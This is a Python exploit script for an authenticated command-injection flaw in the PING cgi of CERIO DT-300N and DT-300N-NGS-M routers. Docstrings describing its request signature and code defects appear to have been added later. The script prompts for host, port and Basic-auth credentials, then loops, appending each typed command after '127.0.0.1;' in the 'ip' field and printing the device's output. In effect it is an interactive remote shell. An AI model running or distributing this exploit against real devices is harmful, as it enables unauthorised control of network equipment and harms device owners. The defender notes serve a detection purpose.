#author:九世
#time:2019/1/30
import requests
import json
import base64
class Demo:
    """Interactive client for the CERIO PING cgi endpoints named in ``__main__``.

    Holds the request headers, the two candidate URLs and the probe payload,
    probes which URL answers 200, then loops reading lines from stdin and
    submitting each one inside the ``ip`` form field (see :meth:`requet`).

    Defender notes (grounded in this file only):
    - Request signature: POSTs to ``/cgi-bin/main.cgi?cgi=PING&mode=9`` or
      ``/cgi-bin/Save.cgi?cgi=PING`` whose ``ip`` field starts with
      ``127.0.0.1;`` and contains the literal ``echo "[[["``.  A WAF or
      device log rule on a ``;`` inside the ``ip`` field catches every
      request this client sends.
    - The class only works with HTTP Basic credentials that the device
      accepts (401 is reported as "Auth is invalid"), so management
      interfaces that are not reachable from untrusted networks are not
      exposed to it.
    """

    def __init__(self, headers: dict, url: str, payload: dict, url2: str) -> None:
        """Store the connection parameters.

        Args:
            headers: HTTP headers sent with every request (built in ``__main__``).
            url: first URL probed (the ``main.cgi`` path in ``__main__``).
            payload: form body sent with each probe/command request.
            url2: fallback URL probed when ``url`` returns 404.
        """
        self.headers=headers
        self.url=url
        self.payload=payload
        self.url2=url2

    def requet(self) -> None:
        """Probe the device, then loop forever reading commands from stdin.

        A 200 from ``self.url`` selects the DT-300N-NGS-M branch; a 404
        falls back to ``self.url2`` (DT-300N branch); a 404 or 401 on the
        fallback calls ``exit()``.  Any other status code on either URL
        simply returns.  Inside either branch the ``while True`` loop has
        no exit condition, so the method never returns normally from it.

        Side effects: network POSTs, ``input()`` reads, ``print`` output,
        and process exit on the fallback's 404/401.
        """
        ver = 'DT-300N-NGS-M'
        ver2='DT-300N'
        version=''
        vurl=''
        # Initial probe: same body and headers that every later request reuses.
        rqt=requests.post(url=self.url,headers=self.headers,data=self.payload)
        nurl=''
        nersion=''
        if rqt.status_code==requests.codes.ok:
            print('[+] Router version number is {}'.format(ver))
            while True:
                rqt = requests.post(url=self.url, headers=self.headers, data=self.payload)
                # nurl is accumulated but never read; nersion grows by `ver`
                # on every pass and is only used as the `ver` argument of
                # command(), where it is compared with 'DT-300N' by equality.
                nurl+=rqt.url
                nersion+=ver
                # Response body is expected to be JSON with a 'pid' key; a
                # non-JSON or pid-less body raises here (ValueError/KeyError).
                nary=json.loads(rqt.content)
                cmd = input('command:')
                # The operator's line is appended after a ';' inside the 'ip'
                # field; the echo "[[[" marker is what command() splits on.
                payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': nary['pid'], 'Times': 1}
                # NOTE(review): `headers` is the module-level name defined in
                # __main__, not self.headers -- a NameError if this class is
                # imported from another module.
                self.command(self.url, headers, payload,nersion)
        elif rqt.status_code==requests.codes.not_found:  # check whether the status code is 404
            print('[-] Router version number is not {}'.format(ver))
            # Same module-level `headers` dependency as above.
            rqts=requests.post(url=self.url2,headers=headers,data=self.payload)
            if rqts.status_code==requests.codes.ok:
                print('[+] Router version number is {}'.format(ver2))
                while True:
                    rqts = requests.post(url=self.url2, headers=headers, data=self.payload)
                    # `version` is appended to every pass, so it equals ver2
                    # only on the first iteration; vurl is never read.
                    version+=ver2
                    vurl+=rqts.url
                    # Here the whole parsed JSON body (not a 'pid' key) is
                    # placed in the 'pid' field, unlike the branch above.
                    vary=json.loads(rqts.content)
                    cmd=input('command:')
                    payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': vary, 'Times': 1}
                    self.command(self.url2,headers,payload,version)
            elif rqts.status_code==requests.codes.not_found:
                print('[-] Router version number is not {}'.format(ver2))
                exit()
            elif rqts.status_code==requests.codes.unauthorized:
                print('[-] Auth is invalid, try other creds')
                exit()

    def command(self,url,header,data,ver) -> None:
        """POST ``data`` to ``url`` and print the response text after a separator.

        Args:
            url: endpoint to POST to.
            header: HTTP headers for this request.
            data: form body (the dict built in :meth:`requet`).
            ver: version tag; exactly ``'DT-300N'`` selects the ``'/html'``
                separator, anything else the ``'[[['`` marker.

        Prints element ``[1]`` of the split, so a response that does not
        contain the separator raises ``IndexError``.
        """
        rsv=requests.post(url=url,headers=header,data=data)
        if ver=='DT-300N':
            print(rsv.text.split('/html')[1])
        else:
            print(rsv.text.split('[[[')[1])
if __name__ == '__main__':
    # Script entry: banner, interactive target/credential prompts, then the
    # request loop in Demo.requet().  Everything below runs only when the
    # file is executed directly; the `headers` name defined here is also
    # read directly by Demo.requet() (not through self.headers).
    print('[&] The version of CERIO that is vulnerable is as follows')
    print('[!] CERIO DT-300N-NGS-M\n[!] CERIO DT-300N')
    print('')
    t=''
    # The two cgi paths probed, in order: `path` first, `path2` on a 404.
    path='/cgi-bin/main.cgi?cgi=PING&mode=9'
    path2='/cgi-bin/Save.cgi?cgi=PING'
    user=input('host:').strip()
    ports=input('port:').strip()
    # NOTE(review): presumably entered as `user:password`, since it is sent
    # verbatim as the Basic-auth value below -- confirm with the prompt's use.
    username=input('creds:').strip()
    # base64(utf-8 bytes of the input) as text for the Authorization header.
    creds=bytes(base64.b64encode(bytes(username,encoding='utf-8'))).decode('utf-8')
    # Substring test, not equality: '4', '43' and '' also select https.
    if ports in '443':
        t+='https://'
    else:
        t+='http://'
    urls=t+user+':'+ports+path
    urls2=t+user+':'+ports+path2
    payload={'cgi':'PING','mode':9}
    # Host and Basic credentials are taken from the prompts; the remaining
    # header values are fixed literals.
    headers={'content-type': 'application/json', 'Host': user, 'Accept-Encoding': 'gzip, deflate','Content-Length': '0', 'Connection': 'keep-alive', 'Authorization': 'Basic {}'.format(creds)}
    obj=Demo(headers=headers,payload=payload,url=urls,url2=urls2)
    obj.requet()